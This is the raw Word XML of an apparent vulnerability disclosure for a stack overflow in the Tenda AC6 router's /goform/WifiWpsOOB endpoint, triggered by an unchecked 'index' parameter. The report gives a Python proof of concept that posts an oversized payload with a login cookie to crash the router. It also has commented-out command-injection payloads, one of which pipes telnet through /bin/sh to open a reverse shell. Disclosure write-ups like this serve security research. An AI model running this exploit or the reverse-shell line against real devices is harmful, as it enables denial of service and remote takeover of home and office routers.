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547F7" w14:textId="5C115087" w:rsidR="00D9395F" w:rsidRDefault="00AB01C8" w:rsidP="00D9395F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00254034">
        <w:t>Tenda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254034">
        <w:t>AC6v1.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6A0A">
        <w:t>V15.03.05.19</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F">
        <w:t xml:space="preserve"> Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81A527" w14:textId="20869803" w:rsidR="00AB01C8" w:rsidRDefault="00D9395F" w:rsidP="00D9395F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8" w:rsidRPr="00254034">
        <w:t xml:space="preserve"> /goform/</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8" w:rsidRPr="00AB01C8">
        <w:t>WifiWpsOOB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23C08A" w14:textId="6048592E" w:rsidR="00AB01C8" w:rsidRPr="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndex</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F" w:rsidRPr="00D9395F">
        <w:t>parameter is not validated for length</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F" w:rsidRPr="00D9395F">
        <w:t>A stack overflow vulnerability could be caused</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sprintf，</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F" w:rsidRPr="00D9395F">
        <w:t>Form a DOS attack on the router</w:t>
      </w:r>
      <w:r w:rsidR="00D9395F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B73907" w14:textId="2411A830" w:rsidR="00177D44" w:rsidRDefault="00AB01C8">
      <w:r w:rsidRPr="00AB01C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B1BF50" wp14:editId="250E05A1">
            <wp:extent cx="5274310" cy="3255645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="50203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3A76" w14:textId="467F965D" w:rsidR="00AB01C8" w:rsidRDefault="00CE158E" w:rsidP="00CE158E">
      <w:pPr>
        <w:ind w:left="420" w:hangingChars="200" w:hanging="420"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8" w:rsidRPr="00AB01C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D872575" wp14:editId="78AE991C">
            <wp:extent cx="5274310" cy="3447415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1587773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7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643" w14:textId="39FCAC36" w:rsidR="00AB01C8" w:rsidRDefault="00D9395F" w:rsidP="00AB01C8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AB01C8" w:rsidRPr="00254034">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00AB01C8" w:rsidRPr="00E55B10">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://192.168.182.111/goform/WifiWpsOOB</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53E2F4C9" w14:textId="4E4709A3" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05461ED0" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18C32A" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>from pwn import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4704058A" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8"/>
    <w:p w14:paraId="00554C8A" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>ip = "192.168.182.111" #You Tenda AC6 Router IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365EF98" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>url = "http://" + ip + "/goform/WifiWpsOOB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A59387" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>print(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63198D30" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8"/>
    <w:p w14:paraId="664A60E6" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>#payload = ";cmd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E743810" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>#payload = ";telnet ip port1 | /bin/sh | telnet ip port2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9795DA" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>payload =b'1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CB671" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8"/>
    <w:p w14:paraId="3CCFFC9F" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8"/>
    <w:p w14:paraId="121B2500" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>cookie = {"Cookie":"password=ucwmji"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36671E2F" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>data = {"index": payload,"wifi_chkHz": payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFDB8DB" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>response = requests.post(url, cookies=cookie, data=data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA983DA" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EA5A7" w14:textId="2E33F0F4" w:rsidR="00AB01C8" w:rsidRPr="00AB01C8" w:rsidRDefault="00AB01C8" w:rsidP="00AB01C8">
      <w:r>
        <w:t>print("HackAttackSuccess!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A815A43" w14:textId="77777777" w:rsidR="00AB01C8" w:rsidRPr="00AB01C8" w:rsidRDefault="00AB01C8"/>
    <w:sectPr w:rsidR="00AB01C8" w:rsidRPr="00AB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67543" w14:textId="77777777" w:rsidR="00BD460A" w:rsidRDefault="00BD460A" w:rsidP="00AB01C8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19A47AFD" w14:textId="77777777" w:rsidR="00BD460A" w:rsidRDefault="00BD460A" w:rsidP="00AB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08EA1" w14:textId="77777777" w:rsidR="00BD460A" w:rsidRDefault="00BD460A" w:rsidP="00AB01C8">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A6D461A" w14:textId="77777777" w:rsidR="00BD460A" w:rsidRDefault="00BD460A" w:rsidP="00AB0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B"/>
    <w:rsid w:val="0013570B"/>
    <w:rsid w:val="00177D44"/>
    <w:rsid w:val="005768F2"/>
    <w:rsid w:val="00A03D08"/>
    <w:rsid w:val="00AB01C8"/>
    <w:rsid w:val="00BD460A"/>
    <w:rsid w:val="00CE158E"/>
    <w:rsid w:val="00D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8A798"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E542B8FB-74B7-4F8A-A015-02844AF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1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1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1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0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B01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2.111/goform/WifiWpsOO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幽</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Microsoft 帐户</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-11T13:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-26T18:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>